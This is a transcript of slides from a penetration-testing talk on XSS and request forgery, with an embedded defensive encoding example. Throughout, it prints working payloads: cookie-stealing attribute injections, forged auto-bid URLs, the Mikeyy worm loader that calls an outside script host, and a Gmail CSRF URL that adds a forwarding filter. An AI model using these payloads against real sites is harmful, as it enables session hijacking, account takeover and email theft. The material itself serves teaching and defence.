VodQA3_PenetrationTesting_AmitDhakkad
Transcript of VodQA3_PenetrationTesting_AmitDhakkad
AMIT DHAKAD
Application Developer
Is considered a "survivor"
Likes To Read About Black Magic & Illusions
What, why and how's of Penetration Testing
- Amit Dhakad, Developer
What do I plan to cover?
What is Penetration Testing?
XSS: What is it? Types of XSS: Reflective XSS, Stored XSS
Request Forgery: What is it? Types of Request Forgery: On-site request forgery, Cross-site request forgery
Demo: Attack mechanisms
Real world examples
Why do we need to pay attention?
Penetration Testing: Simulating a malicious attack on a system
Cross-site scripting (XSS): Injecting javascript through user-controllable fields
Reflective XSS: Injecting javascript using url parameters
Diagram courtesy : The Web Application Hacker’s Handbook
Attack:
http://localhost:3000/pure-reflective-xss?query=title"onclick="window.location.href=('http://localhost:3000/log?message='%2Bdocument.cookie)
Stored XSS: Exploiting server's ability to persist
Diagram courtesy : The Web Application Hacker’s Handbook
Attack:
Image url is set to
http://www.myflorida.org.uk/images/disney_gif/Donald.gif"onmouseover="window.location.href=('http://localhost:3000/log?message='+document.cookie)
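Both payloads above work the same way: user-controlled text lands inside a double-quoted HTML attribute, and the embedded quote closes that attribute so an onclick/onmouseover handler can be appended. The following is an added example, not code from the talk or its demo app, showing the defence for both the reflective and the stored case: contextual output encoding at render time, plus write-time validation of the image URL field. The route (/pure-reflective-xss), the query parameter and the image URL payload are the ones on the slides; the function names (escapeHtml, renderSearchBox, validateImageUrl, renderImage) are hypothetical stand-ins for the demo app's view code.

```javascript
// Added example: contextual output encoding against the reflective and stored
// XSS payloads on the slides. Route and field names come from the talk's demo;
// the functions are hypothetical stand-ins, not the demo app's real code.

// Encode the characters that change meaning in HTML text and inside
// double-quoted attribute values. Encoding the quote is what keeps an
// attacker-controlled value from closing the attribute it was placed in,
// which is exactly how both payloads get their event handler in.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Stand-in for /pure-reflective-xss: reflects ?query= into an input's value
// attribute, as the vulnerable demo does, but encoded for that context.
function renderSearchBox(query) {
  return '<input type="text" name="query" value="' + escapeHtml(query) + '">';
}

// Characters RFC 3986 allows in a URL. A double quote is not among them, so
// the stored payload (Donald.gif"onmouseover=...) never reaches the database.
const URL_CHARS = /^[A-Za-z0-9\-._~:\/?#\[\]@!$&'()*+,;=%]+$/;

// Write-time validation for the auction's image URL field. Returns the
// normalised absolute URL, or null when the value is rejected.
function validateImageUrl(raw) {
  if (typeof raw !== 'string' || !URL_CHARS.test(raw)) return null;
  let url;
  try {
    url = new URL(raw); // throws for relative or malformed input
  } catch (err) {
    return null;
  }
  // Only http(s) images; javascript: and data: URLs are refused.
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  return url.href;
}

// Render time: encode again even though the value was validated, so a value
// that reached the database by another path still cannot break out.
function renderImage(storedUrl) {
  return '<img src="' + escapeHtml(storedUrl) + '" alt="auction item">';
}

// Number of raw double quotes in a rendered fragment; after encoding, only
// the template's own attribute quotes should remain.
function rawQuoteCount(html) {
  return (html.match(/"/g) || []).length;
}
```

Run against the reflective payload, renderSearchBox leaves exactly the template's six quotes in the output and the injected `"onclick="` survives only as `&quot;onclick=&quot;`, i.e. inert text inside the value. The stored payload is refused at write time because of the quote, and the relative URL used in the later "attack without XSS" slide is refused because an image URL must be absolute http(s); rejecting the input does not replace the CSRF controls, it just removes one delivery channel. Encoding at render time is kept regardless, which is the lesson of the MySpace worm later in the talk: a blacklist of dangerous words can be split apart, an encoder that treats every quote and angle bracket the same way cannot.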
Request Forgery: Perform unwitting actions on behalf of the user
On-site Request Forgery (OSRF): From same domain
Attack with XSS:
Image url is set to
http://www.myflorida.org.uk/images/disney_gif/Donald.gif" onmouseover="var form=document.getElementById('new_bid'); form.bid_amount.value=100;form.submit();
Attack without XSS:
Image url is set to
/bids?bid[amount]=500&bid[auction_id]=1
Cross-site Request Forgery (CSRF): From a different domain
Same origin policy:
A page residing on one domain can cause an arbitrary request to be made to another domain, but it cannot itself process the data returned from that request.
A page residing on one domain can load a script from another domain and execute this within its own context.
What can you do with XSS and Request Forgery?
Session hijacking
Performing arbitrary actions
Disclosure of user data
Real world attacks
MySpace worm by Samy (XSS + OSRF)
Bypassed all filters and added a script to his profile
The script did two things:
- Added the visiting user as a friend
- Copied itself into the visiting user's profile, so anyone visiting the newly infected user also got added as Samy's friend
Protection: MySpace strips out the word "onreadystatechange", which is necessary for XML-HTTP requests
Attack: eval('xmlhttp.onread' + 'ystatechange = callback');
eBay – discovered by Dave Armstrong (OSRF)
Crafted url set as image url
Arbitrary bid was placed on behalf of the visiting user
Mikeyy twitter worm (XSS + OSRF)
Implemented by a 17-year-old boy
"><title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script>
-- "<script src="http://www.stalkdaily.com/ajax.js"></script>"
Visiting users got infected
Infected users began tweeting unwittingly.
Gmail vulnerability – discovered by Petko Petkov (CSRF)
http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&[email protected]&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter
Adds a filter that forwards all emails to the attacker's email address
Why do we need to pay attention?
The shift is towards attacking clients
Technologies don't provide strong protection
Considered lame attacks
Identification using automated tools is difficult
Penetration testing is considered a separate vertical
Break your own walls before anyone else does
Q & A
Thank you